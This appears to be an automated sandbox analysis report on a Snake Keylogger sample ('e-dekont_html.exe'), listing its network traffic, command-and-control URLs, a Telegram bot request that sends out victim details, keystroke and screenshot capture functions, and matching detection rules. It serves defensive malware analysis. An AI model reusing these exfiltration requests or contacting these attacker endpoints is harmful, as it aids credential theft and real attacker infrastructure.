                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:24:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2017:43:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 20 Nov 2024 06:52:27 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 20 Nov 2024 06:52:32 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                Source: e-dekont_html.exe, 00000000.00000002.1769422089.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 00000009.00000002.1839101508.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: e-dekont_html.exe, fahKSvwo.exe.0.dr | String found in binary or memory: http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.Resources
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000000.00000002.1776697265.0000000005D10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                Source: e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20a
                Source: fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003454000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enX~
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.000000000345E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlBfq
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003360000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003360000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.000000000331A000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003360000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004014000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004137000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004061000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004647000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004571000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043F4000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004523000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000437F000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: e-dekont_html.exe, 00000008.00000002.4169157251.0000000003FEF000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.000000000401A000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004112000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E4B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000435B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004622000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000044FF000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000452A000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004014000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004137000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004061000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004647000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004571000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043F4000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004523000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000437F000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: e-dekont_html.exe, 00000008.00000002.4169157251.0000000003FEF000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.000000000401A000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004112000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E4B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000435B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004622000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000044FF000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000452A000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003494000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/X~
                Source: e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.000000000348F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lBfq
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61282 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61290 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, COVID19.cs | .Net Code: TakeScreenshot
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, COVID19.cs | .Net Code: TakeScreenshot
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, COVID19.cs | .Net Code: VKCodeToUnicode
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, COVID19.cs | .Net Code: VKCodeToUnicode

                System Summary

                Source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 0_2_012BD57C
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 0_2_076B6508
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 0_2_076B0740
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 0_2_076B0C50
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 0_2_08F00040
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 0_2_08F034B8
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 0_2_08F0EAE0
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 0_2_08F0EF19
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 0_2_08F0F360
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 0_2_08F034A8
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 0_2_08F06673
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 0_2_08F06678
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BED278
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BE5362
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BE7118
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BEC147
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BEC738
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BEC468
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BECA08
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BE69A0
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BEE988
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BECFAA
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BECCD8
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BE9DE0
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BEF631
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BEFA88
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BE29E0
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BEE97A
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Code function: 8_2_02BE3E09
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 9_2_02B6D57C
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 9_2_07232106
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 9_2_072334B8
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 9_2_07236669
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 9_2_07236678
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 9_2_0723EF28
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 9_2_0723EAF0
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 9_2_072334A8
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 9_2_0723F360
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 9_2_07255788
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 9_2_07250740
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 9_2_07250C50
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_0159C146
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_01595362
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_0159D278
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_0159C468
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_0159C738
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_0159E988
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_015969A0
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_01593B95
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_0159CA08
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_01599DE0
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_0159CCD8
